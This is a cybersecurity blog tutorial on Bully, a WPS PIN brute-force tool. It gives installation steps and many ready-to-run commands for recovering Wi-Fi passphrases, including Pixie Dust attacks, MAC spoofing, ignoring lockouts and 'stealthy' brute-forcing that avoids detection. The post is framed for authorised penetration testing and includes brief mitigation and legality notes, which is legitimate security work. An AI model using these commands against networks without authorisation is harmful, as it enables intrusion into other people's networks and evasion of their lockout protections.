dark
Hand-Picked Top-Read Stories
Trending Tags
5 minute read

bully: A tool for exploiting WPS vulnerabilities in Wi-Fi networks

Abdul Wahab Junaid
May 16, 2025
bully: A tool for exploiting WPS vulnerabilities in Wi-Fi networks
Total
1
Shares
0
0
1
0
0
0
0
0

What is Bully?

Bully is a Wi-Fi Protected Setup (WPS) PIN brute-force tool designed to recover WPS PINs and subsequently the WPA/WPA2 passphrases of vulnerable wireless networks. It’s an alternative to tools like Reaver, offering some advantages in speed and reliability against certain router models.

what Bully does and why it’s used:

  • Exploiting WPS Vulnerabilities: The core function of Bully is to perform a brute-force attack on the WPS PIN. The WPS PIN is an 8-digit number, but due to a design flaw, the authentication process reveals whether the first four digits are correct independently of the last four. This significantly reduces the number of possible combinations an attacker needs to try. Instead of 108 attempts for an 8-digit PIN, it’s effectively reduced to around 104 (for the first half) + 103 (for the second half, as the 8th digit is a checksum), making the brute-force attack feasible.
  • Alternative to Reaver: Bully is a newer implementation of the WPS brute-force attack, often cited as an improvement over the original Reaver tool. It’s written in C and offers advantages like fewer dependencies, improved memory and CPU performance, and more robust options.
  • How it Works (Simplified):
    1. Monitor Mode: Bully requires a wireless interface that supports monitor mode to capture Wi-Fi traffic.
    2. Target Identification: It identifies WPS-enabled access points.
    3. PIN Brute-Forcing: Bully then systematically tries different PIN combinations against the target AP.
    4. WPA PSK Recovery: Once the correct WPS PIN is found, Bully can often recover the WPA/WPA2 Pre-Shared Key (PSK) for the network.
  • Pixie-Dust Attack: Bully can also be used in conjunction with “Pixie-Dust” attacks. This is an offline brute-force attack that can be much faster than traditional online WPS PIN brute-forcing if the access point is vulnerable to certain nonce (number used once) generation issues.
  • Usage in Penetration Testing: Tools like Bully are used by security professionals for penetration testing and auditing the security of Wi-Fi networks. They help identify if a network is vulnerable to WPS attacks, allowing administrators to take corrective measures.
  • Mitigation: The most effective way to prevent WPS attacks is to disable WPS on your router. If disabling WPS isn’t an option, ensure your router’s firmware is up-to-date, as some newer devices might have built-in protections against these specific attacks. Using a strong, unique WPA2 password is also crucial.

Installation

Bully comes pre-installed in Kali Linux. If you need to install or update it:

Bash
sudo apt update
sudo apt install bully

For manual installation from source:

Bash
git clone https://github.com/aanarchyy/bully
cd bully/src
make
sudo make install

Basic Usage Examples

Usage:

  • bully interface: This is the general syntax for running the tool. You provide various options followed by the name of your wireless interface that must be in monitor mode.

Required Arguments:

These are essential for Bully to know what to attack.

  • Alternatively, you can specify the ESSID (network name, e.g., “MyHomeWiFi”). If there are multiple APs with the same ESSID, using the BSSID (-b) is more precise. Example: -e "My WiFi Network"
    • interface: Wireless interface in monitor mode (root required)
  • This is your Wi-Fi adapter (e.g., wlan0mon, mon0). It must be in monitor mode, which allows it to capture all wireless traffic, not just traffic intended for it. Running in monitor mode typically requires root privileges.
    • -b, --bssid macaddr: MAC address of the target access point
  • You can specify the BSSID (MAC address) of the Wi-Fi router you want to target. This is the most common and recommended way to specify the target. Example: -b 00:11:22:33:44:55
    • -e, --essid string: Extended SSID for the access point

Basic attack against a target AP:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55

Verbose mode with channel specification:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 -v 3

Using a specific PIN database:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -f pin-database.txt

Advanced Usage Examples

Bypassing fake AP detections:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 --force

Session resumption (after interruption):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 --pixiewps -S session.bully

Pixie Dust attack (for vulnerable routers):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 --pixiewps

Command-Line Options

Required Arguments (Must Specify One)

OptionDescription
-b, --bssid Target AP’s MAC address (e.g., 00:11:22:33:44:55)
-e, --essid Target AP’s SSID (if MAC is unknown)

Example:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55

Optional Arguments

Basic Options

OptionDescriptionDefault
-c, --channel NAP channel (or list, e.g., 1,6,11)Auto
-i, --index NStart at a specific PIN index (7/8 digits)Auto
-l, --lockwait NWait time if AP locks WPS (seconds)43
-o, --outfile Save output to filestdout
-p, --pin NStart with a specific PIN (7/8 digits)Auto
-v, --verbosity NLogging level (1=quiet, 4=debug)3
-5, --5ghzEnable 5GHz channel hoppingDisabled

Example (Target channel 6 with high verbosity):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 -v 4

Brute-Force & Performance

OptionDescription
-B, --bruteforceForce-check all PIN checksum digits
-F, --forceIgnore warnings (e.g., fake AP detection)
-S, --sequentialDisable PIN randomization
-T, --testDry-run (no packets injected)

Example (Brute-force mode):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -B

Advanced Arguments

Pixie Dust Attack

OptionDescription
-d, --pixiewpsEnable Pixie Dust attack (for vulnerable routers)

Example:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -d

MAC Spoofing & Stealth

OptionDescription
-s, --source Spoof source MAC address
-W, --windows7Masquerade as Windows 7 registrar
-P, --probeUse probe requests for hidden APs

Example (Spoof MAC and mimic Windows):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -s 66:77:88:99:AA:BB -W

Lockout Handling

OptionDescription
-D, --detectlockDetect AP lockouts (even if unreported)
-L, --lockignoreIgnore AP-reported lockouts

Example (Aggressive mode, ignore locks):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -F -L

Throttling & Timeouts

OptionDescription
-1, --pin1delay M,NDelay M sec every N M5/M7 NACKs
-2, --pin2delay M,NDelay M sec every N M5/M7 NACKs
-Z, --suppressDisable packet throttling (faster but risky)

Example (Add delays to avoid lockouts):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -1 2,3 -2 5,1

Real-World Use Cases

  1. Pixie Dust Attack (Fast exploit for vulnerable routers):
Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -d -v 4
  1. Stealthy PIN Brute-Force (Slow, avoids detection):
Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -1 5,1 -2 10,1 -S
  1. Resume Interrupted Session:
Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -p 12345670

Troubleshooting Cheatsheet

IssueSolution
AP not respondingCheck channel (-c), enable -P for hidden APs
AP locks WPSUse -l 60 (longer wait) or -L (ignore locks)
Low success rateTry -B (brute-force checksum) or -d (Pixie Dust)
Packet injection failsVerify monitor mode (airmon-ng check kill)

Troubleshooting Tips

Common Issues and Solutions:

  1. Interface not found:

    • Ensure your wireless card is in monitor mode (sudo airmon-ng start wlan0)
    • Verify interface name with iwconfig

  2. AP not responding:

    • Confirm the AP has WPS enabled
    • Check you’re on the correct channel
    • Try reducing distance to the AP

  3. AP locks WPS:

    • Use -d to add delays between attempts
    • Try --pixiewps if supported
    • Wait for the lockout period to expire

  4. Low success rate:

    • Try different PIN generation strategies (-B option)
    • Use known vendor-specific PIN algorithms

  5. Pixie Dust not working:

    • Confirm the router is vulnerable to Pixie Dust
    • Try with -v 3 for detailed error messages

Ethical Considerations

Remember that using Bully against networks you don’t own or have permission to test is illegal in most jurisdictions. Always obtain proper authorization before conducting any wireless security testing.

Best Practices

  1. Use in controlled environments for legitimate testing only
  2. Combine with other tools like wash to identify WPS-enabled APs
  3. Document findings for security improvement reports
  4. Consider router firmware updates that disable WPS as a mitigation
Share 0
Tweet 0
Total
1
Shares
Share 0
Tweet 0
Pin it 1
Share 0
Share 0
Like 0
Share 0
Abdul Wahab Junaid Author
Protecting your data has never been more important. My cyber security blog is here to help you stay ahead of the game. I cover a wide range of topics, including phishing attacks, ransomware, data breaches, and much more.

Leave a Reply

Previous Post
wordlists: Pre-compiled lists of common passwords for attacks

wordlists: Pre-compiled lists of common passwords for attacks

May 16, 2025
Next Post
fern-wifi-cracker: A GUI tool for testing wireless network security, focusing on WPA/WPA2 cracking

fern-wifi-cracker: A GUI tool for testing wireless network security, focusing on WPA/WPA2 cracking

May 16, 2025
Related Posts